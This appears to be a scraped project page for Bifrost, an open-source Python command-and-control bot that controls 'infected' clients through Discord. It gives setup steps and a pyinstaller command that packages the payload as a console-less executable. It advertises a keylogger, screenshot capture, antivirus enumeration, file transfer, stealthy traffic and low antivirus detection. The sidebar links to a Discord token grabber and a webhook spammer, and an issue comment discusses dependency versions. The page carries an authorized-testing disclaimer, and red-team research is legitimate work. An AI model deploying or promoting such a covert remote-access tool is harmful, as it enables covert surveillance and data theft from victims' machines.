Bifrost C2. Open-source post-exploitation using Discord API

Related tags

Third-party APIs Wrapperspythonwindowsmacoslinuxdiscorddiscord-botencrypted-connectionspost-exploitationpentestoffensive-securityred-teamc2pentest-toolcommand-and-controlcommand-control
Overview


Bifrost
Bifrost

Command and Control

What's Bifrost?

Bifrost is an open-source Discord BOT that works as Command and Control (C2). This C2 uses Discord API for communication between clients and server.

Developed with Python, this C2 have multiples features for post-exploitation.

How Bifrost works?

As mentioned before, Bifrost is basically a discord bot that receive commands from the Discord user and do a pre-defined task.

So for every client that you are going to "infect", you will send a copy of this discord bot, and it will respond to you using discord. This allows you to hide behind Discord service being stealth and have a secure connection between you and your client.

Disclaimer: This project should be used for authorized testing or educational purposes only.

Virustotal

Virustotal detection was 5/67 when there was none defense against sandbox execution.

Antivirus that detected Bifrost as malicious was SecureAge APEX, Jiangmin, Cynet, Zillya and Palo Alto Networks

Bifrost Features

  • Multiple clients.
  • Multi-platform support.
  • Keylogger.
  • Antivirus enumeration.
  • Real-time communication.
  • Encrypted(HTTPS) communication.
  • Fast and stealth communication trough Discord API.
  • No need of public service.
  • Screenshot gathering.
  • Download and upload of files.

⚠️ Contributors ⚠️

Bifrost is an open project, so, if you want to add some functionality, improve features or code performance in Bifrost, the best way to get it to the main project is to create a fork and open pull request.

Installation

1 - Clone or download Bifrost source code;

2 - Install lib dependencies;

pip install -r requirements.txt

3 - Have Discord account;

4 - Create an application (Bot) on Discord;

5 - Go to General information tab and copy your Application ID;

6 - Go to Bot tab, create the Bot and copy it's token

7 - Invite your bot to your discord server by filling up the following link with your application ID;

https://discord.com/oauth2/authorize?client_id=<APP_ID>&scope=bot&permissions=8

8 - Now create a channel in your Discord server and copy its ID;

Obs.: Activate developers function in your discord app to copy channel ID easily.

Now with those 2 information (channel ID and Bot Token), change the var values on 22 and 23 lines in bifrost.py file to your account/channel values.

Client Installation

After creating your bot, channel and changing the variable values, follow the steps bellow to deploy the payload to your client

Windows

Create an bifrost executable file using pyinstaller, or sending bifrost.py to client and installing all dependencies.

Using the executable file, the client don't need to have python or any dependencies pre-installed.

pyinstaller bifrost.py --onefile --noconsole --key th3r4ven_bifrost or
python -m pyinstaller bifrost.py --onefile --noconsole --key th3r4ven_bifrost

OBS.: All of this params are optional, read pyinstaller documentation for more information on how to use it.

Linux\Mac OS

You can send the bifrost.py and install the dependencies, or create and script/executable to automate this process, similar to windows installation

To do

  • Persistence feature
  • Bind shell connection
  • Stealth Download
  • Upload big files anonymously
  • Live/recorded voice streaming
  • Fix Bugs/Issues

Screen live stream is not possible trough Discord API :(

Screenshots

You might also like...
AWS Blog post code for running feature-extraction on images using AWS Batch and Cloud Development Kit (CDK).

Batch processing with AWS Batch and CDK Welcome This repository demostrates provisioning the necessary infrastructure for running a job on AWS Batch u

AWS Samples 7 Oct 18, 2022
A small and fun Discord Bot that is written in Python and discord-interactions (with discord.py)
A small and fun Discord Bot that is written in Python and discord-interactions (with discord.py)

Articuno (discord-interactions) A small and fun Discord Bot that is written in Python and discord-interactions (with discord.py) Get started If you wa

Blue 8 Dec 26, 2022
Discord bot script for sending multiple media files to a discord channel according to discord limitations.

Discord Bulk Image Sending Bot Send bulk images to Discord channel. This is a bot script that will allow you to send multiple images to Discord channe

Nikola Arbov 1 Jan 13, 2022
MicroStealer - A compact Discord Token Logger/Discord Token Grabber made in only 15 lines of code! Injects into discord for long-term use

💾 MicroStealer ⚡ A compact Discord Token Logger/Discord Token Grabber made in o

DeKrypt 24 Sep 21, 2022
The best (and now open source) Discord selfbot.

React Selfbot Yes, for real Why am I making this open source? Because can't stop calling my product a rat, tokenlogger and what else not. But there is

null 30 Nov 13, 2022
The open source version of Tentro - A multipurpose Discord bot.

Welcome to Tentro 👋 A multipurpose Discord bot. 🏠 Homepage Install pip install -r requirements.txt Usage py Tentro.py Contributors 👤 Tentro Dev Tea

null 6 Jul 14, 2022
A free and open-source discord webhook spammer.

Discord-Webhook-Spammer A free and open-source discord webhook spammer. Usage Depending on your python installation your commands may vary. Below are

null 3 Sep 8, 2021
This is a open source discord bot project

pythonDiscordBot This is a open source discord bot project #based on the MAX A video: https://www.youtube.com/watch?v=jHZlvRr9KxM Prerequisites Python

Edson Holanda Teixeira Junior 3 Oct 11, 2021
Dante, my discord bot. Open source project in development and not optimized for other filesystems, install and setup script in development

DanteMode (In private development for ~6 months) Dante, my discord bot. Open source project in development and not optimized for other filesystems, in

null 2 Nov 5, 2021
Comments
  • Suggest to loosen the dependency on discord.py

    Suggest to loosen the dependency on discord.py

    Dear developers,

    Your project Bifrost requires "discord.py==1.7.1" in its dependency. After analyzing the source code, we found that the following versions of discord.py can also be suitable without affecting your project, i.e., discord.py 1.7.0, 1.7.2, 1.7.3. Therefore, we suggest to loosen the dependency on discord.py from "discord.py==1.7.1" to "discord.py>=1.7.0,<=1.7.3" to avoid any possible conflict for importing more packages or for downstream projects that may use ddos_script.

    May I pull a request to further loosen the dependency on discord.py?

    By the way, could you please tell us whether such dependency analysis may be potentially helpful for maintaining dependencies easier during your development?


    Details:

    Your project (commit id: b5ae2fc024e3e0a7104cfb5c2cb394876c2a8853) directly uses 2 APIs from package discord.py.

    discord.file.File.__init__, discord.client.Client.__init__

    Beginning fromwhich, 15 functions are then indirectly called, including -2 discord.py's internal APIs and 17 outsider APIs as follows:

    [/th3r4ven/Bifrost]
+--discord.file.File.__init__
|      +--os.path.split
+--discord.client.Client.__init__
|      +--asyncio.get_event_loop
|      +--discord.http.HTTPClient.__init__
|      |      +--asyncio.get_event_loop
|      |      +--weakref.WeakValueDictionary
|      |      +--asyncio.Event
|      +--discord.client.Client._get_state
|      |      +--discord.state.ConnectionState.__init__
|      |      |      +--discord.flags.Intents.default
|      |      |      +--warnings.warn
|      |      |      +--discord.flags.MemberCacheFlags.from_intents
|      |      |      +--inspect.getmembers
|      |      |      +--discord.state.ConnectionState.clear
|      |      |      |      +--weakref.WeakValueDictionary
|      |      |      |      +--collections.OrderedDict
|      |      |      |      +--collections.deque
|      |      |      |      +--gc.collect
|      +--asyncio.Event

    Since all these functions have not been changed between any version for package "discord.py" from [1.7.0, 1.7.2, 1.7.3] and 1.7.1. Therefore, we believe it is safe to loosen the corresponding dependency.

    opened by Agnes-U 0
Releases(1.0)
Owner
GitHub Repository
A community made discord bot coded in Python and running on AWS.

Pogbot Project Open Group Discord This is an open source community ran project. Join the discord for more information on how to participate. Coded in

Project Open Group 2 Jul 27, 2022
Dynamic Twitter banner, to show off your spotify status. Banner updated every 5 minutes.

Spotify Twitter Banner Dynamic Twitter banner, to show off your spotify status. Banner updated every 5 minutes. Installation and Usage Install the dep

Sunrit Jana 23 Jan 05, 2023
A head unit UI designed to replace the RTx/SMEG/RNEG/NG4/RCC/NAC

HeadUnit UI (Come discuss about it on our Discord!) Intro This is the UI part of a headunit project from OpenLeo, based on python and kivy, it looks l

OpenLeo 6 Nov 23, 2022
Automation that uses Github Actions, Google Drive API, YouTube Data API and youtube-dl together to feed BackJam app with new music

Automation that uses Github Actions, Google Drive API, YouTube Data API and youtube-dl together to feed BackJam app with new music

Antônio Oliveira 1 Nov 21, 2021
Access LeetCode problems via id

LCid - access LeetCode problems via id Introduction As a world's leading online programming learning platform, LeetCode is quite popular among program

bunnyxt 14 Oct 08, 2022
A multipurpose bot designed to make Discord better for everyone, written in Python.

Hadum A multipurpose bot that makes Discord better for everyone Features A Fully Functional Moderation component: manage your staff, members and permi

1 Jan 25, 2022
Twitter FakeNFT With Python

This project is a server that fetches your Twitter profile picture and applies the hexagonal transparency mask displayed on the profiles of users who have an NFT profile picture.

Mathis HAMMEL 29 Apr 23, 2022
WhatsApp API Python ChatBot

WhatsApp Api Python - Esta documentação tem como objetivo exemplificar o uso do Moorse Whatsapp API na linguagem Python.

Douglas Alves 2 Jan 06, 2022
A simple telegram bot to help you to remove forward tag from post from any messages . Maded in python3 using @Pyrogram . Developed by @Kunal-Diwan

Frwd-Tag-Remover Telegram Bot to Remove forward tag from any Post . If you need any more modes in repo or If you find out any bugs, mention in @Develo

Kunal Diwan 2 Oct 14, 2022
Simple Python Auto Follow Bot

Instagram-Auto-Follow-Bot Description Một IG BOT đơn giản. Tự động follow những người mà bạn muốn cướp follow. Tự động unfollow. Tự động đăng nhập vào

CodingLinhTinh 3 Aug 27, 2022
Api REST para gerenciamento de cashback.

Documentação API para gerenciamento de cashback - MaisTODOS Features Em construção... Tecnologias utilizadas Back end Python 3.8.10 Django REST Framew

Alinne Grazielle 2 Jan 22, 2022
IMDbPY is a Python package useful to retrieve and manage the data of the IMDb movie database about movies, people, characters and companies

IMDbPY is a Python package for retrieving and managing the data of the IMDb movie database about movies, people and companies. Revamp notice Starting

Davide Alberani 1.1k Jan 02, 2023
YARSAW is an Async Python API Wrapper for the Random Stuff API.

Yet Another Random Stuff API Wrapper - YARSAW YARSAW is an Async Python API Wrapper for the Random Stuff API. This module makes it simpler for you to

Bruce 6 Mar 27, 2022
Discord Remote Administration Tool

Discord Remote Administration Tool

Rdimo 82 Aug 15, 2022
A Recommendation System For Diabetes Detection And Treatment

Diabetes-detection-tg-bot A Recommendation System For Diabetes Detection And Treatment Данная система помогает определить наличие или отсутствие сахар

Alexander Kanonirov 1 Nov 22, 2021
The official command-line client for spyse.com

Spyse CLI The official command-line client for spyse.com. NOTE: This tool is currently in the early stage beta and shouldn't be used in production. Yo

Spyse 43 Dec 08, 2022
A bot to view Garfield comics directly from Discord and get updates of the comics automatically

Garfield-Bot A bot to view Garfield comics directly from Discord and get updates of the comics automatically. Instructions to use the bot: Invite the

Raghav Sharma 3 Feb 13, 2022
ChairBot is designed to be reliable, easy to use, and lightweight for every user, and easliy to code add-ons for ChairBot.

ChairBot is designed to be reliable, easy to use, and lightweight for every user, and easliy to code add-ons for ChairBot. Ready to see whats possible with ChairBot?

1 Nov 08, 2021
Lumberjack-bot - A game bot written for Lumberjack game at Telegram platform

This is a game bot written for Lumberjack game at Telegram platform. It is devel

Uğur Uysal 6 Apr 07, 2022
A tool written in Python used to instalock agents in VALORANT using the local API.

Valorant Instalock Tool v2.1.0 by Mr. SOSA A tool written in Python used to instalock agents in VALORANT using the local API. This is NOT a hotkey pro

Mr. SOSA 3 Nov 18, 2021